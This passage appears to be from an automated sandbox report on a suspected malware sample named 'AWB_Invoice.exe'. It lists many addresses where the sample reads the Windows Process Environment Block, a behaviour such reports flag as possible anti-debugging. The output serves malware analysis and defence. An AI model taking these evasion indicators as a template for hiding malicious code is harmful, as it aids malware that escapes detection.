      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FB55F mov eax, dword ptr fs:[00000030h]4_2_358FB55F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FB55F mov eax, dword ptr fs:[00000030h]4_2_358FB55F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA553 mov eax, dword ptr fs:[00000030h]4_2_358EA553
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583C560 mov eax, dword ptr fs:[00000030h]4_2_3583C560
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820485 mov ecx, dword ptr fs:[00000030h]4_2_35820485
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585B490 mov eax, dword ptr fs:[00000030h]4_2_3585B490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585B490 mov eax, dword ptr fs:[00000030h]4_2_3585B490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC490 mov eax, dword ptr fs:[00000030h]4_2_358AC490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358224A2 mov eax, dword ptr fs:[00000030h]4_2_358224A2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358224A2 mov ecx, dword ptr fs:[00000030h]4_2_358224A2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov ecx, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov eax, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov eax, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358544A8 mov eax, dword ptr fs:[00000030h]4_2_358544A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B84BB mov eax, dword ptr fs:[00000030h]4_2_358B84BB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4BC mov eax, dword ptr fs:[00000030h]4_2_3585E4BC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358444D1 mov eax, dword ptr fs:[00000030h]4_2_358444D1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358444D1 mov eax, dword ptr fs:[00000030h]4_2_358444D1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358554E0 mov eax, dword ptr fs:[00000030h]4_2_358554E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4EF mov eax, dword ptr fs:[00000030h]4_2_3585E4EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4EF mov eax, dword ptr fs:[00000030h]4_2_3585E4EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF4FD mov eax, dword ptr fs:[00000030h]4_2_358DF4FD
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358264F0 mov eax, dword ptr fs:[00000030h]4_2_358264F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A4F0 mov eax, dword ptr fs:[00000030h]4_2_3585A4F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A4F0 mov eax, dword ptr fs:[00000030h]4_2_3585A4F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358494FA mov eax, dword ptr fs:[00000030h]4_2_358494FA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF409 mov eax, dword ptr fs:[00000030h]4_2_358DF409
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B6400 mov eax, dword ptr fs:[00000030h]4_2_358B6400
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B6400 mov eax, dword ptr fs:[00000030h]4_2_358B6400
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581640D mov eax, dword ptr fs:[00000030h]4_2_3581640D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857425 mov eax, dword ptr fs:[00000030h]4_2_35857425
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857425 mov ecx, dword ptr fs:[00000030h]4_2_35857425
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B420 mov eax, dword ptr fs:[00000030h]4_2_3581B420
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A9429 mov eax, dword ptr fs:[00000030h]4_2_358A9429
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A0443 mov eax, dword ptr fs:[00000030h]4_2_358A0443
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D450 mov eax, dword ptr fs:[00000030h]4_2_3585D450
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D450 mov eax, dword ptr fs:[00000030h]4_2_3585D450
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA464 mov eax, dword ptr fs:[00000030h]4_2_358EA464
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828470 mov eax, dword ptr fs:[00000030h]4_2_35828470
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828470 mov eax, dword ptr fs:[00000030h]4_2_35828470
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF478 mov eax, dword ptr fs:[00000030h]4_2_358DF478
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851796 mov eax, dword ptr fs:[00000030h]4_2_35851796
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851796 mov eax, dword ptr fs:[00000030h]4_2_35851796
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358207A7 mov eax, dword ptr fs:[00000030h]4_2_358207A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F17BC mov eax, dword ptr fs:[00000030h]4_2_358F17BC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF7CF mov eax, dword ptr fs:[00000030h]4_2_358DF7CF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E7E0 mov eax, dword ptr fs:[00000030h]4_2_3584E7E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358277F9 mov eax, dword ptr fs:[00000030h]4_2_358277F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358277F9 mov eax, dword ptr fs:[00000030h]4_2_358277F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D700 mov ecx, dword ptr fs:[00000030h]4_2_3582D700
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E970B mov eax, dword ptr fs:[00000030h]4_2_358E970B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E970B mov eax, dword ptr fs:[00000030h]4_2_358E970B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582471B mov eax, dword ptr fs:[00000030h]4_2_3582471B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582471B mov eax, dword ptr fs:[00000030h]4_2_3582471B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF717 mov eax, dword ptr fs:[00000030h]4_2_358DF717
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35849723 mov eax, dword ptr fs:[00000030h]4_2_35849723
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A174B mov eax, dword ptr fs:[00000030h]4_2_358A174B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A174B mov ecx, dword ptr fs:[00000030h]4_2_358A174B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35853740 mov eax, dword ptr fs:[00000030h]4_2_35853740
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585174A mov eax, dword ptr fs:[00000030h]4_2_3585174A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov ecx, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A750 mov eax, dword ptr fs:[00000030h]4_2_3585A750
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CE750 mov eax, dword ptr fs:[00000030h]4_2_358CE750
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35832760 mov ecx, dword ptr fs:[00000030h]4_2_35832760
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850774 mov eax, dword ptr fs:[00000030h]4_2_35850774
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824779 mov eax, dword ptr fs:[00000030h]4_2_35824779
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824779 mov eax, dword ptr fs:[00000030h]4_2_35824779
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF68C mov eax, dword ptr fs:[00000030h]4_2_358DF68C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828690 mov eax, dword ptr fs:[00000030h]4_2_35828690
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589D69D mov eax, dword ptr fs:[00000030h]4_2_3589D69D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC691 mov eax, dword ptr fs:[00000030h]4_2_358AC691
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E86A8 mov eax, dword ptr fs:[00000030h]4_2_358E86A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E86A8 mov eax, dword ptr fs:[00000030h]4_2_358E86A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358206CF mov eax, dword ptr fs:[00000030h]4_2_358206CF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA6C0 mov eax, dword ptr fs:[00000030h]4_2_358EA6C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358C86C2 mov eax, dword ptr fs:[00000030h]4_2_358C86C2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D6D0 mov eax, dword ptr fs:[00000030h]4_2_3584D6D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358196E0 mov eax, dword ptr fs:[00000030h]4_2_358196E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358196E0 mov eax, dword ptr fs:[00000030h]4_2_358196E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358466E0 mov eax, dword ptr fs:[00000030h]4_2_358466E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358466E0 mov eax, dword ptr fs:[00000030h]4_2_358466E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589C6F2 mov eax, dword ptr fs:[00000030h]4_2_3589C6F2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589C6F2 mov eax, dword ptr fs:[00000030h]4_2_3589C6F2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D600 mov eax, dword ptr fs:[00000030h]4_2_3584D600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D600 mov eax, dword ptr fs:[00000030h]4_2_3584D600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF607 mov eax, dword ptr fs:[00000030h]4_2_358DF607
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585360F mov eax, dword ptr fs:[00000030h]4_2_3585360F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4600 mov eax, dword ptr fs:[00000030h]4_2_358F4600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov ecx, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov ecx, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov eax, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35825622 mov eax, dword ptr fs:[00000030h]4_2_35825622
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35825622 mov eax, dword ptr fs:[00000030h]4_2_35825622
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35827623 mov eax, dword ptr fs:[00000030h]4_2_35827623
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C620 mov eax, dword ptr fs:[00000030h]4_2_3585C620
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820630 mov eax, dword ptr fs:[00000030h]4_2_35820630
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850630 mov eax, dword ptr fs:[00000030h]4_2_35850630
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov esi, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov eax, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov eax, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F63F mov eax, dword ptr fs:[00000030h]4_2_3585F63F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F63F mov eax, dword ptr fs:[00000030h]4_2_3585F63F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823640 mov eax, dword ptr fs:[00000030h]4_2_35823640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C640 mov eax, dword ptr fs:[00000030h]4_2_3585C640
